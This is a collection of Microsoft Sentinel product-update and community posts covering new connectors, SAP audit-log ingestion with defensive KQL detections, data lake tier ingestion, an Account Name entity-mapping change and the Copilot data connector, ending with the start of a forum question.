What’s new in Microsoft Sentinel: February 2026
February brings a set of new innovations to Sentinel that help you work with security content across your SOC. This month’s updates focus on how security teams ingest, manage, and operationalize content, with new connectors, multi-tenant content distribution capabilities, and an enhanced UEBA Essentials solution to surface high‑risk behavior faster across cloud and identity environments. We’re also introducing new partner-built agentic experiences available through Microsoft Security Store, enabling customers to extend Sentinel with specialized expertise directly inside their existing workflows. Together, these innovations help SOC teams move faster, scale smarter, and unlock deeper security insight without added complexity.

Expand your visibility and capabilities with Sentinel content

Seamlessly onboard security data with growing out-of-the-box connectors (general availability)

Sentinel continues to expand its connector ecosystem, making it easier for security teams to bring together data from across cloud, SaaS, and on-premises environments so nothing critical slips through the cracks. With broader coverage and faster onboarding, SOCs can unlock unified visibility, stronger analytics, and deeper context across their entire security stack. Customers can now use out-of-the-box connectors and solutions for:

- Mimecast Audit Logs
- CrowdStrike Falcon Endpoint Protection
- Vectra XDR
- Palo Alto Networks Cloud NGFW
- SocPrime
- Proofpoint on Demand (POD) Email Security
- Pathlock
- MongoDB
- Contrast ADR

For the full list of connectors, see our documentation. Share your input on what to prioritize next with our App Assure team.

Microsoft 365 Copilot data connector (public preview)

The Microsoft 365 Copilot connector brings Microsoft 365 Copilot audit logs and activity data into Sentinel, giving security teams visibility into how Microsoft 365 Copilot is being used across their organization.
Once ingested, this data can power analytics rules, custom detections, workbooks, automation, and investigations, helping SOC teams quickly spot anomalies, misuse, and policy violations. Customers can also send this data to the Sentinel data lake for advanced scenarios, such as custom graphs and MCP integrations, while benefiting from lower-cost ingestion and flexible retention. Learn more here.

Transition your Sentinel connectors to the codeless connector framework (CCF)

Microsoft is modernizing data connectors by shifting from Azure Function-based connectors to the codeless connector framework (CCF). CCF enables partners, customers, and developers to build custom connectors that ingest data into Sentinel with a fully SaaS-managed experience, built-in health monitoring, centralized credential management, and enhanced performance. We recommend that customers review their deployed connectors and move to the latest CCF versions to ensure uninterrupted data collection and continued access to the latest Sentinel capabilities. As part of Azure’s modernization of custom data collection, the legacy custom data collection API will be retired in September 2026.

Centrally manage and distribute Sentinel content across multiple tenants (public preview)

For partners and SOCs managing multiple Sentinel tenants, you can now centrally manage and distribute Sentinel content from the Microsoft Defender portal. With multi-tenant content distribution, you can replicate analytics rules, automation rules, workbooks, and alert tuning rules across tenants instead of rebuilding the same detections, automation, and dashboards in one environment at a time. This helps you onboard new tenants faster, reduce configuration drift, and maintain a consistent security baseline, while execution still happens locally in each target tenant under centralized control.
Learn more: New content types supported in multi-tenant content distribution

Find high-risk anomalous behavior faster with an enhanced UEBA Essentials solution (public preview)

The UEBA Essentials solution now helps SOC teams uncover high‑risk anomalous behavior faster across Azure, AWS, GCP, and Okta. With expanded multi-cloud anomaly detection and new queries powered by the anomalies table, analysts can quickly surface the riskiest activity, establish reliable behavioral baselines, and understand anomalies in context without chasing noisy or disconnected signals. UEBA Essentials aligns activity to MITRE ATT&CK, highlights complex malicious IP patterns, and builds a comprehensive anomaly profile for users in seconds, reducing investigation time while improving signal quality across identity and cloud environments.

UEBA Essentials is available directly from the Sentinel content hub, with 30+ prebuilt UEBA queries ready to deploy. Behavior analytics can be enabled automatically from the connectors page as new data sources are added, making it easy to turn deeper insight into immediate action. For more information, see: UEBA Solution Power Boost: Practical Tools for Anomaly Detection

Extend Sentinel with partner-built Security Copilot agents in Microsoft Security Store (general availability)

You can extend Sentinel with partner-built Security Copilot agents that are discoverable and deployable through Microsoft Security Store in the Defender experience. These AI-powered agents are created by trusted partners specifically to work with Sentinel, delivering packaged expertise for investigation, triage, and response without requiring you to build your own agentic workflows from scratch. These partner-built agents work with Sentinel analytics and incidents to help SOC teams triage faster, investigate deeper, and surface insights that would otherwise take hours of manual effort.
For example, these agents can review Sentinel and Defender environments, map attacker activity, or automate forensic analysis and SOC reporting. BlueVoyant’s Watchtower agent helps optimize Sentinel and Defender configurations, AdaQuest’s Data Leak agent accelerates response by surfacing risky data exposure and identity misuse, and Glueckkanja’s Attack Mapping agent automatically maps fragmented entities and attacker behavior into a coherent investigation story. Together, these agents show how the Security Store turns partner innovation into enterprise-ready, Security Copilot-powered capabilities that you can use in your existing SOC workflows. Browse these and more partner-built Security Copilot agents in the Security Store within the Defender portal. At Ignite, we announced the native integration of Security Store within the Defender portal. Read more about the GA announcement here: Microsoft Security Store: Now Generally Available

Explore the Sentinel experience

Enhanced reports in the Threat Intelligence Briefing Agent (general availability)

The Threat Intelligence Briefing Agent now applies a structured knowledge graph to Microsoft Defender for Threat Intelligence, enabling it to surface fresher, more relevant threats tailored to a customer’s specific industry and region. Building on this foundation, the agent also features embedded, high‑fidelity Microsoft Threat Intelligence citations, providing authoritative context directly within each insight. With these advancements, security teams gain clearer, more actionable guidance and mitigation steps through context‑rich insights aligned to their environment, helping them focus on what matters most and respond more confidently to emerging threats.
Learn more: Microsoft Security Copilot Threat Intelligence Briefing Agent in Microsoft Defender

Microsoft Purview Data Security Investigations (DSI) integrated with Sentinel graph (general availability)

Sentinel now brings together data‑centric and threat‑centric insights to help teams understand risk faster and respond with more confidence. By combining AI‑powered deep content analysis from Microsoft Purview with activity‑centric graph analytics in Sentinel, security teams can identify sensitive or risky data, see how it was accessed, moved, or exposed, and take action from a single experience. This gives SOC and data security teams a full, contextual view of the potential blast radius, connecting what happened to the data with who accessed it and how, so investigations are faster, clearer, and more actionable. Start using the Microsoft Purview Data Security Investigations (DSI) integration with the Sentinel graph to give your analysts richer context and streamline end‑to‑end data risk investigations.

Deadline to migrate the Sentinel experience from Azure to Defender extended to March 2027

To reduce friction and support customers of all sizes, we are extending the sunset date for managing Sentinel in the Azure portal to March 31, 2027. This additional time ensures customers can transition confidently while taking advantage of new capabilities that are becoming available in the Defender portal. Learn more about this decision, why you should start planning your move today, and find helpful resources here: UPDATE: New timeline for transitioning Sentinel experience to Defender portal

Events and webinars

Stay connected with the latest security innovations and best practices through global conferences and expert‑led sessions that bring the community together to learn, connect, and explore how Microsoft is delivering AI‑driven, end‑to‑end security for the modern enterprise.
Join us at RSAC, March 23–26, 2026 at the Moscone Center in San Francisco

Register for RSAC and stop by the Microsoft booth to see our latest security innovations in action. Learn how Sentinel SIEM and platform help organizations stay ahead of threats, simplify operations, and protect what matters most. Register today!

Microsoft Security Webinars

Discover upcoming sessions on Sentinel SIEM & platform, Defender, and more. Sign up today and be part of the conversation that shapes security for everyone. Learn more about upcoming webinars.

Additional resources

Blogs: UPDATE: New timeline for transitioning Sentinel experience to Defender portal, Accelerate your move to Microsoft Sentinel with AI-powered SIEM migration tool, Automating Microsoft Sentinel: A blog series on enabling Smart Security, The Agentic SOC Era: How Sentinel MCP Enables Autonomous Security Reasoning

Documentation: What Is a Security Graph?, SIEM migration tool, Onboarding to Microsoft Sentinel data lake from the Defender portal

Stay connected

Check back each month for the latest innovations, updates, and events to ensure you’re getting the most out of Sentinel. We’ll see you in the next edition!

SAP & Business-Critical App Security Connectors
I validated what it takes to make SAP and SAP-adjacent security signals operational in a SOC: reliable ingestion, stable schemas, and detections that survive latency and schema drift. I focus on four integrations into Microsoft Sentinel: SAP Enterprise Threat Detection (ETD) cloud edition (SAPETDAlerts_CL, SAPETDInvestigations_CL), SAP S/4HANA Cloud Public Edition agentless audit ingestion (ABAPAuditLog), Onapsis Defend (Onapsis_Defend_CL), and SecurityBridge (also ABAPAuditLog). Because vendor API specifics for the ETD Retrieval API and Audit Retrieval API aren’t publicly detailed in the accessible primary sources I could retrieve, I explicitly label pagination/rate/time-window behaviors as unspecified where appropriate.

Connector architectures and deployment patterns

For SAP-centric telemetry I separate two planes. First is SAP application telemetry that lands in SAP-native tables, especially ABAPAuditLog, ABAPChangeDocsLog, ABAPUserDetails, and ABAPAuthorizationDetails. These tables are the foundation for ABAP-layer monitoring and are documented with typed columns in the Azure Monitor Logs reference. Second is external security-product telemetry (ETD alerts, Onapsis findings). This lands in custom tables (*_CL) and typically requires a SOC-owned normalization layer to avoid brittle detections.

Within Microsoft’s SAP solution itself, there are two deployment models: agentless and containerized connector agent. The agentless connector uses SAP Cloud Connector and SAP Integration Suite to pull logs, and Microsoft documents it as the recommended approach; the containerized agent is being deprecated and will be disabled on September 14, 2026.

On the implementation-technology axis, Sentinel integrations generally show up as:

- Codeless Connector Framework (CCF) pollers/pushers (SaaS-managed ingestion definitions with DCR support).
- Function/Logic App custom pipelines using the Logs Ingestion API when you need custom polling, enrichment, or a vendor endpoint that isn’t modeled in CCF.

In my view, the ETD and S/4HANA Cloud connectors are “agentless” from the Sentinel side (API credentials only), while the Onapsis Defend and SecurityBridge connectors behave like push pipelines, because Microsoft requires an Entra app + DCR permissions (the typical Logs Ingestion API pattern).

Authentication and secrets handling

Microsoft documents the required credentials per connector:

- The ETD cloud connector requires a Client Id + Client Secret for the ETD Retrieval API (token mechanics unspecified).
- The S/4HANA Cloud Public Edition connector requires a Client Id + Client Secret for the Audit Retrieval API (token mechanics unspecified), and Microsoft notes “alternative authentication mechanisms” exist (details in the linked repo are unspecified in accessible sources).
- The Onapsis Defend and SecurityBridge connectors require a Microsoft Entra ID app registration and Azure permission to assign Monitoring Metrics Publisher on DCRs. This maps directly to the Logs Ingestion API guidance, where a service principal is granted DCR access via that role (or the Microsoft.Insights/Telemetry/Write data action).

For production, I treat these as “SOC platform secrets”:

- Store client secrets/certificates in Key Vault when you own the pipeline (Function/Logic App); rotate on an operational schedule; alert on auth failures and sudden ingestion drops.
- For vendor-managed ingestion (Onapsis/SecurityBridge), I still require documented ownership of the Entra app, explicit RBAC scope for the DCR, and change control for credential rotation, because a rotated secret is effectively a data outage.

API behaviors and ingestion reliability

For the ETD Retrieval API and Audit Retrieval API, pagination, rate limits, and time windows are unspecified in the accessible vendor documentation I could retrieve.
I therefore design ingestion and detections assuming non-ideal API behavior: late-arriving events, cursor/page limitations, and throttling. CCF’s RestApiPoller model supports explicit retry policy, windowing, and multiple paging strategies, so if/when you can obtain vendor API semantics, you can encode them declaratively (rather than writing fragile code).

For the SAP solution’s telemetry plane, Microsoft provides strong operational cues: agentless collection flows through Integration Suite, and troubleshooting typically happens in the Integration Suite message log; this is where I validate delivery failures before debugging Sentinel-side parsers.

For scheduled detections, I always account for ingestion delay explicitly. Microsoft’s guidance is to widen the event lookback by the expected delay and then constrain on ingestion_time() to prevent duplicates from overlap.

Schema, DCR transformations, and normalization layer

Connector attribute comparison:

- SAP ETD (cloud): Auth: Client ID + Secret (ETD Retrieval API); Tables: SAPETDAlerts_CL, SAPETDInvestigations_CL; Default polling, backfill, pagination, rate limits: unspecified.
- SAP S/4HANA Cloud (agentless): Auth: Client ID + Secret (Audit Retrieval API), alternative auth referenced; Tables: ABAPAuditLog; Default polling, backfill, pagination, rate limits: unspecified.
- Onapsis Defend: Auth: Entra app + DCR permission (Monitoring Metrics Publisher); Tables: Onapsis_Defend_CL; Default polling: n/a (push pattern); Backfill: unspecified; Pagination: n/a; Rate limits: unspecified.
- SecurityBridge: Auth: Entra app + DCR permission (Monitoring Metrics Publisher); Tables: ABAPAuditLog; Default polling: n/a (push pattern); Backfill: unspecified; Pagination: n/a; Rate limits: unspecified.

Ingestion-time DCR transformations

Sentinel supports ingestion-time transformations through DCRs to filter, enrich, and mask data before it’s stored.
Example: I remove low-signal audit noise and mask email identifiers in ABAPAuditLog:

source
| where isnotempty(TransactionCode) and isnotempty(User)
| where TransactionCode !in ("SM21","ST22") // example noise; tune per tenant
| extend Email = iif(Email has "@",
    strcat(substring(Email,0,2), "***@", tostring(split(Email,"@")[1])),
    Email)

Normalization functions

Microsoft explicitly recommends using the SAP solution functions instead of raw tables, because the underlying infrastructure can then change without breaking detections. I follow the same pattern for ETD/Onapsis custom tables: I publish SOC-owned functions as a schema contract.

.create-or-alter function with (folder="SOC/SAP") Normalize_ABAPAudit() {
    ABAPAuditLog
    | project TimeGenerated, SystemId, ClientId, User, TransactionCode, TerminalIpV6,
              MessageId, MessageClass, MessageText, AlertSeverityText, UpdatedOn
}

.create-or-alter function with (folder="SOC/SAP") Normalize_ETDAlerts() {
    SAPETDAlerts_CL
    | extend
        AlertId = tostring(coalesce(column_ifexists("AlertId",""), column_ifexists("id",""))),
        Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))),
        SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("User",""), column_ifexists("user","")))
    | project TimeGenerated, AlertId, Severity, SapUser, *
}

.create-or-alter function with (folder="SOC/SAP") Normalize_Onapsis() {
    Onapsis_Defend_CL
    | extend
        FindingId = tostring(coalesce(column_ifexists("FindingId",""), column_ifexists("id",""))),
        Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))),
        SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("user","")))
    | project TimeGenerated, FindingId, Severity, SapUser, *
}

Health/lag monitoring and anti-gap

I monitor both connector health and ingestion delay. SentinelHealth is the native health table, and Microsoft provides a health workbook and a schema reference for the fields.
let lookback = 24h;
union isfuzzy=true
    (ABAPAuditLog | extend T="ABAPAuditLog"),
    (SAPETDAlerts_CL | extend T="SAPETDAlerts_CL"),
    (Onapsis_Defend_CL | extend T="Onapsis_Defend_CL")
| where TimeGenerated > ago(lookback)
| summarize
    LastEvent = max(TimeGenerated),
    P95DelaySec = percentile(datetime_diff("second", ingestion_time(), TimeGenerated), 95),
    Events = count()
    by T

Anti-gap scheduled-rule frame (Microsoft pattern):

let ingestion_delay = 10m;
let rule_lookback = 5m;
ABAPAuditLog
| where TimeGenerated >= ago(ingestion_delay + rule_lookback)
| where ingestion_time() > ago(rule_lookback)

SOC detections for ABAP privilege abuse, fraud/insider behavior, and audit readiness

Privileged ABAP transaction monitoring

ABAPAuditLog includes TransactionCode, User, SystemId, and terminal/IP fields, so I start with a curated high-risk tcode set and then add baselines.

let PrivTCodes = dynamic(["SU01","PFCG","SM59","RZ10","SM49","SE37","SE16","SE16N"]);
Normalize_ABAPAudit()
| where TransactionCode in (PrivTCodes)
| summarize Actions = count(), Ips = make_set(TerminalIpV6, 5)
    by SystemId, User, TransactionCode, bin(TimeGenerated, 1h)
| where Actions >= 3

Fraud/insider scenario: sensitive object change near privileged audit activity

ABAPChangeDocsLog exposes ObjectClass, ObjectId, and change types; I correlate sensitive object changes to privileged transactions in a tight window.

let w = 10m;
let Sensitive = dynamic(["BELEG","BPAR","PFCG","IDENTITY"]);
ABAPChangeDocsLog
| where ObjectClass in (Sensitive)
| project ChangeTime=TimeGenerated, SystemId,
          User=tostring(column_ifexists("User","")),
          ObjectClass, ObjectId,
          TypeOfChange=tostring(column_ifexists("ItemTypeOfChange",""))
| join kind=innerunique (
    Normalize_ABAPAudit()
    | project AuditTime=TimeGenerated, SystemId, User, TransactionCode
) on SystemId, User
| where AuditTime between (ChangeTime-w ..
ChangeTime+w)
| project ChangeTime, AuditTime, SystemId, User, ObjectClass, ObjectId, TransactionCode, TypeOfChange

Audit-ready pipeline: monitoring continuity and configuration touchpoints

I treat audit logging itself as a monitored control. A simple SOC-safe control is a volume drop by system; it’s vendor-agnostic and catches pipeline breaks and deliberate suppression.

Normalize_ABAPAudit()
| summarize PerHour = count() by SystemId, bin(TimeGenerated, 1h)
| summarize Avg = avg(PerHour), Latest = arg_max(TimeGenerated, PerHour) by SystemId
| where Latest_PerHour < (Avg * 0.2)

Where Onapsis/ETD are present, I increase fidelity by requiring privileged ABAP activity plus an external SAP-security product finding (field mappings are tenant-specific; normalize first):

let win = 1h;
Normalize_ABAPAudit()
| where TransactionCode in ("SU01","PFCG","SM59","SE16N")
| join kind=leftouter (Normalize_Onapsis()) on $left.User == $right.SapUser
| where isnotempty(FindingId) and TimeGenerated1 between (TimeGenerated .. TimeGenerated+win)
| project TimeGenerated, SystemId, User, TransactionCode, FindingId, OnapsisSeverity=Severity

Production validation, troubleshooting, and runbook

For acceptance, I validate in this order: table creation, freshness/lag percentiles, connector health state, and a cross-check of event counts against the upstream system for the same UTC window (where available). Connector health monitoring is built around SentinelHealth plus the Data collection health workbook. For SAP agentless ingestion, Microsoft states most troubleshooting happens in Integration Suite message logs; this is where I triage authentication/networking failures before tuning KQL. For Onapsis/SecurityBridge-style ingestion, I validate Entra app auth, DCR permission assignment (Monitoring Metrics Publisher), and a minimal ingestion test payload using the Logs Ingestion API tutorial flow.
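To make that acceptance pass repeatable, I keep a small SentinelHealth triage query alongside the freshness query above. This is a sketch: column names follow the SentinelHealth schema reference, but the exact resource-type string should be verified against your tenant before alerting on it.

```kusto
// Recent non-success connector health events (sketch; verify the exact
// SentinelResourceType value against the SentinelHealth schema reference).
SentinelHealth
| where TimeGenerated > ago(24h)
| where SentinelResourceType has "connector"
| where Status != "Success"
| summarize Failures = count(), LastSeen = max(TimeGenerated), Reasons = make_set(Description, 5)
    by SentinelResourceName, Status
| order by LastSeen desc
```

I wire the same query into a scheduled rule so a silent auth failure surfaces as an incident rather than a quiet data gap.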
Operational runbook items I treat as non-optional: health alerts on connector failure and freshness drift; scheduled-rule anti-gap logic; playbooks that capture evidence bundles (an ABAPAuditLog slice plus user context from ABAPUserDetails/ABAPAuthorizationDetails); DCR filters to reduce noise and cost; and change control for normalization functions and watchlists.

SOC “definition of done” checklist (short):

1) Tables present and steadily ingesting;
2) P95 ingestion delay measured and rules use the anti-gap pattern;
3) SentinelHealth enabled with alerts;
4) SOC-owned normalization functions deployed;
5) at least one privileged-tcode rule + one change-correlation rule + one audit-continuity rule in production.

Mermaid ingestion flow (diagram not reproduced in this extract).

Data lake tier Ingestion for Microsoft Defender Advanced Hunting Tables is Now Generally Available
Today, we’re excited to announce the general availability (GA) of data lake tier ingestion for Microsoft Defender XDR Advanced Hunting tables into Microsoft Sentinel data lake. Security teams continue to generate unprecedented volumes of high‑fidelity telemetry across endpoints, identities, cloud apps, and email. While this data is essential for detection, investigation, and threat hunting, it also creates new challenges around scale, cost, and long‑term retention.

With this release, users can now ingest Advanced Hunting data from:

- Microsoft Defender for Endpoint (MDE)
- Microsoft Defender for Office 365 (MDO)
- Microsoft Defender for Cloud Apps (MDA)

directly into Sentinel data lake, without requiring ingestion into the Microsoft Sentinel analytics tier. Support for Microsoft Defender for Identity (MDI) Advanced Hunting tables will follow in the near future.

Supported Tables

This release enables data lake tier ingestion for Advanced Hunting data from:

- Defender for Endpoint (MDE) – DeviceInfo, DeviceNetworkInfo, DeviceProcessEvents, DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceLogonEvents, DeviceImageLoadEvents, DeviceEvents, DeviceFileCertificateInfo
- Defender for Office 365 (MDO) – EmailAttachmentInfo, EmailEvents, EmailPostDeliveryEvents, EmailUrlInfo, UrlClickEvents
- Defender for Cloud Apps (MDA) – CloudAppEvents

Each source is ingested natively into Sentinel data lake, aligning with Microsoft’s broader lake‑centric security data strategy. As mentioned above, Microsoft Defender for Identity support will arrive in the near future.

What’s New with Data Lake Tier Ingestion

Until now, Advanced Hunting data was primarily optimized for near‑real‑time security operations and analytics. As users extend their detection strategies to include longer retention, retrospective analysis, AI‑driven investigations, and cross‑domain correlation, the need for a lake‑first architecture becomes critical.
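To make “retrospective analysis” concrete, here is a hedged sketch of a lake-tier hunt an analyst might run via the KQL explorer or a KQL job. It assumes DeviceLogonEvents has been switched to the data lake tier with extended retention; the lookback and thresholds are illustrative, not recommendations.

```kusto
// Retrospective hunt sketch over lake-tier MDE data: accounts with
// sustained failed-logon bursts over the past year. Thresholds illustrative.
DeviceLogonEvents
| where TimeGenerated > ago(365d)
| where ActionType == "LogonFailed"
| summarize Failures = count(), Devices = dcount(DeviceName)
    by AccountName, bin(TimeGenerated, 1d)
| where Failures > 100
| order by TimeGenerated desc
```

Because the data stays in the lake tier, a hunt like this does not require re-ingesting historical telemetry into the analytics tier.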
With data lake tier ingestion, Sentinel data lake becomes a first-class destination for XDR insights, enabling users to:

- Store high‑volume Defender Advanced Hunting data efficiently at scale while reducing operational overhead
- Extend security analytics beyond traditional analytics-tier lifespans for investigation, compliance, and threat research, with up to 12 years of retention
- Query data using KQL‑based experiences across unified datasets with the KQL explorer, KQL jobs, and notebook jobs
- Integrate data with AI-driven tooling via the MCP server for quick, interactive insights into the environment
- Visualize threat landscapes and relational mappings while threat hunting with custom Sentinel graphs
- Decouple storage and retention decisions from real‑time SIEM operations while building a more flexible and future-proof Sentinel architecture

Enabling Sentinel Data Lake Tier Ingestion for Advanced Hunting Tables

The ingestion pipeline for sending Defender Advanced Hunting data to Sentinel data lake leverages existing infrastructure and UI experiences. To enable Advanced Hunting tables for Sentinel data lake ingestion:

1. Within the Defender portal, expand the Microsoft Sentinel section in the left navigation.
2. Go to Configuration > Tables.
3. Find any of the tables listed above and select one.
4. In the side menu that opens, select Data Retention Settings.
5. Once the options open, select the button next to ‘Data lake tier’ to set the table to ingest directly into Sentinel data lake.
6. Set the desired total retention for the data.
7. Click Save.

This configuration allows Defender data to reside within each Advanced Hunting table for 30 days, where it remains accessible via custom detections and queries, while a copy of the logs is sent to Sentinel data lake for use with custom graphs and the MCP server, with the option of retention up to 12 years.

Why Data Lake Tier Ingestion Matters

Built for Scale and Cost Efficiency

Advanced Hunting data is rich, and voluminous.
Sentinel data lake enables users to store this data using a lake‑optimized model, designed for high‑volume ingestion and long‑term analytical workloads, while making it easy to manage table tiers and usage.

A Foundation for Advanced Analytics

With Defender data co‑located alongside other security and cloud signals, users can unlock:

- Cross‑domain investigations across endpoint, identity, cloud, and email
- Retrospective hunting without re‑ingestion
- AI‑assisted analytics and large‑scale pattern detection

Flexible Architecture for Modern Security Teams

Data lake tier ingestion supports a layered security architecture, where:

- Workspaces remain optimized for real‑time detection and SOC workflows
- The data lake serves as the cost-effective and durable system for security telemetry

Users can choose the right level of ingestion depending on operational needs, without duplicating data paths or cost.

Designed to Work with Existing Sentinel and XDR Experiences

This GA release builds on Microsoft Sentinel’s ongoing investment in unified data configuration and management:

- Native integration with Microsoft Defender XDR Advanced Hunting schemas
- Alignment with existing Sentinel data lake query and exploration experiences
- Consistent management alongside other first‑party and third‑party data sources
- Consistent experiences within the Defender portal

No changes are required to existing Defender deployments to begin using data lake tier ingestion.

Get started

To learn more about Microsoft Sentinel data lake and managing Defender XDR data within Sentinel, visit the Microsoft Sentinel documentation and explore how lake‑based analytics can complement your existing security operations. We look forward to seeing how users use this capability to explore new detection strategies, perform deeper investigations, and build long‑term security habits.

Update: Changing the Account Name Entity Mapping in Microsoft Sentinel
The upcoming update introduces more consistent and predictable entity data across analytics, incidents, and automation by standardizing how the Account Name property is populated when using UPN‑based mappings in analytics rules. Going forward, the Account Name property will consistently contain only the UPN prefix, with new dedicated fields added for the full UPN and the UPN suffix. While this improves consistency and enables more granular automation, customers who rely on specific Account Name values in automation rules or Logic App playbooks may need to take action.

Timeline

Effective date: July 1, 2026. The change will apply automatically; no opt-in is required.

Scope of impact

Analytics rules that map a User Principal Name (UPN) to the Account Name entity field, where the resulting alerts are processed by automation rules or Logic App playbooks that reference the AccountName property.

What’s changing

Currently, when an analytics rule maps a full UPN (for example, 'user@domain.com') to the Account Name field, the resulting input value for the automation rule or Logic App playbook is inconsistent: in some cases it contains only the UPN prefix ('user'), and in other cases the full UPN ('user@domain.com').

After July 1, 2026:

- The Account Name property will consistently contain only the UPN prefix
- The following new fields will be added to the entity object: AccountName (UPN prefix), UPNSuffix, UserPrincipalName (full UPN)

This change enables enhanced filtering and automation logic based on these new fields.
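Once the change lands, a quick query against the SecurityAlert table can confirm the new fields are present in your workspace. This is a sketch: the field names (AccountName, UPNSuffix, UserPrincipalName) follow this announcement, and the exact JSON property casing in the Entities column should be verified in your tenant.

```kusto
// Sketch: inspect Account entities in recent alerts for the new UPN fields.
// Field names follow this announcement; verify casing in your tenant.
SecurityAlert
| where TimeGenerated > ago(1d)
| mv-expand Entity = todynamic(Entities)
| where tostring(Entity.Type) =~ "account"
| project AlertName,
          AccountName = tostring(Entity.AccountName),
          UPNSuffix = tostring(Entity.UPNSuffix),
          UserPrincipalName = tostring(Entity.UserPrincipalName)
```

Running this before and after the effective date makes it easy to spot any automation conditions that still expect a full UPN in Account Name.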
Example

Before:
- Analytics rule maps: 'user@domain.com'
- Automation rule receives: Account Name: 'user' or 'user@domain.com' (inconsistent)

After:
- Analytics rule maps: 'user@domain.com'
- Automation rule receives: Account Name: 'user'; UPNSuffix: 'domain.com'
- Logic App playbook and the SecurityAlert table receive: AccountName: 'user'; UPNSuffix: 'domain.com'; UserPrincipalName: 'user@domain.com'

(The original post includes a before/after comparison table by feature/location, covering the SecurityAlert table and the Logic App playbook entity; it is not reproduced here.)

Why does it matter?

If your automation logic relies on exact string comparisons against the full UPN stored in Account Name, those conditions may no longer match after the update. This most commonly affects:

- Automation rules using an "Equals" condition on Account Name
- Logic App playbooks comparing the entity field 'accountName' to a full UPN value

Call to action

Avoid strict equality checks against Account Name. Use flexible operators such as Contains or Starts with, and leverage the new UPNSuffix field for clearer intent.

Example update

Before: Account Name will show as 'user' or 'user@domain.com'
After: Account Name will show as 'user'

Recommended changes:
- Account Name Contains/Startswith 'user'
- UPNSuffix Equals/Startswith/Contains 'domain.com'

This approach ensures compatibility both before and after the change takes effect.

Where to update

Review any filters, conditions, or branching logic that depend on Account Name values.
- Automation rules: use the 'Account name' field
- Logic App playbooks: update conditions referencing the entity field 'accountName'

(The original post includes before/after screenshots of an example automation rule; they are not reproduced here.)

Summary

- A consistency improvement to Account Name mapping is coming on July 1, 2026
- The change affects automation rules and Logic App playbooks that rely on UPN-to-Account Name mappings
- New UPN-related fields provide better structure and control
- Customers should follow the recommendations above before the effective change date

The Microsoft Copilot Data Connector for Microsoft Sentinel is Now in Public Preview
We are happy to announce a new data connector that is now publicly available: the Microsoft Copilot data connector for Microsoft Sentinel. The new connector ingests audit logs and activities generated by the different Copilot offerings into Microsoft Sentinel and the Microsoft Sentinel data lake. Copilot activities can then be leveraged within Microsoft Sentinel features such as analytic rules/custom detections, Workbooks, automation, and more. Sending Copilot data to the Sentinel data lake also opens up integrations with custom graphs, the MCP server, and more, while offering lower-cost ingestion and longer retention as needed.

Eligibility for the Connector

The connector is available for all customers within Microsoft Sentinel, but it will only ingest data for environments that have access to Copilot licenses and SCUs, as the activities rely on Copilot being used. These logs are available via the Purview Unified Audit Log (UAL) feed, which is available and enabled for all users by default. A big value of this new connector is that it eliminates the need for users to go to the Purview Portal to see these activities: they are proactively brought into the workspace, enabling SOCs to generate detections and proactively threat hunt on this information.

Note: This data connector is a single-tenant connector, meaning that it ingests the data for the entire tenant that it resides in. This connector is not designed to handle multi-tenant configurations.
What’s Included in the Connector

The following record types from the Office 365 Management API are supported as part of this connector:

- 261 CopilotInteraction
- 310 CreateCopilotPlugin
- 311 UpdateCopilotPlugin
- 312 DeleteCopilotPlugin
- 313 EnableCopilotPlugin
- 314 DisableCopilotPlugin
- 315 CreateCopilotWorkspace
- 316 UpdateCopilotWorkspace
- 317 DeleteCopilotWorkspace
- 318 EnableCopilotWorkspace
- 319 DisableCopilotWorkspace
- 320 CreateCopilotPromptBook
- 321 UpdateCopilotPromptBook
- 322 DeleteCopilotPromptBook
- 323 EnableCopilotPromptBook
- 324 DisableCopilotPromptBook
- 325 UpdateCopilotSettings
- 334 TeamCopilotInteraction
- 363 Microsoft365CopilotScheduledPrompt
- 371 OutlookCopilotAutomation
- 389 CopilotForSecurityTrigger
- 390 CopilotAgentManagement

These are great options for monitoring users who have permission to make changes to Copilot across the environment. This data can help identify anomalous interactions between users and Copilot, unauthorized access attempts, or malicious prompt usage.

How to Deploy the Connector

The connector is available via the Microsoft Sentinel Content Hub and can be installed today. To find the connector:

1. Within the Defender Portal, expand the Microsoft Sentinel navigation in the left menu.
2. Expand Configuration and select Content Hub.
3. Within the search bar, search for “Copilot”.
4. Click on the solution that appears and click Install.
5. Once the solution is installed, configure the connector by clicking on it within the solution and selecting Open Connector Page.

To enable the connector, the user needs either the Global Administrator or Security Administrator role on the tenant. Once the connector is enabled, the data is sent to the table named CopilotActivity.

Note: Data ingestion costs apply when using this data connector. Pricing is based on the settings for the Microsoft Sentinel workspace or at the Microsoft Sentinel data lake tier pricing.
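Once data lands in CopilotActivity, a simple hunting query can highlight who is changing Copilot configuration across the tenant. This is a minimal sketch; the Operation and UserId column names are assumptions based on typical Unified Audit Log schemas, so verify them against your workspace before relying on the query:

```kusto
// Sketch: review Copilot management changes from the new CopilotActivity table.
// Column names (Operation, UserId) are assumptions - check your schema.
CopilotActivity
| where TimeGenerated > ago(30d)
| where Operation in ("CreateCopilotPlugin", "UpdateCopilotPlugin", "DeleteCopilotPlugin",
                      "CreateCopilotWorkspace", "DeleteCopilotWorkspace", "UpdateCopilotSettings")
| summarize Changes = count(), Operations = make_set(Operation) by UserId, bin(TimeGenerated, 1d)
| order by Changes desc
```

A spike in Changes for a single user, or an unexpected UserId performing delete operations, is a good starting point for an investigation or a custom analytics rule.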
As this data connector is in Public Preview, you can start deploying it right now! As always, let us know what you think in the comments so that we can continue to build what is most valuable to you. We hope this new data connector provides your SOC with high-value insights that empower your security operations.

Resources:

Office Management API Event Number List: https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema#auditlogrecordtype
Purview Unified Audit Log Library: Audit log activities | Microsoft Learn
Copilot Inclusion in the Microsoft E5 Subscription: Learn about Security Copilot inclusion in Microsoft 365 E5 subscription | Microsoft Learn
Microsoft Sentinel: What is Microsoft Sentinel SIEM? | Microsoft Learn
Microsoft Sentinel Platform: Microsoft Sentinel data lake overview - Microsoft Security | Microsoft Learn

NetworkSignatureInspected
Hi,

Whilst looking into something, I was thrown off by a line in a device timeline export with an ActionType of NetworkSignatureInspected, and its content. I've read this article, so I understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek

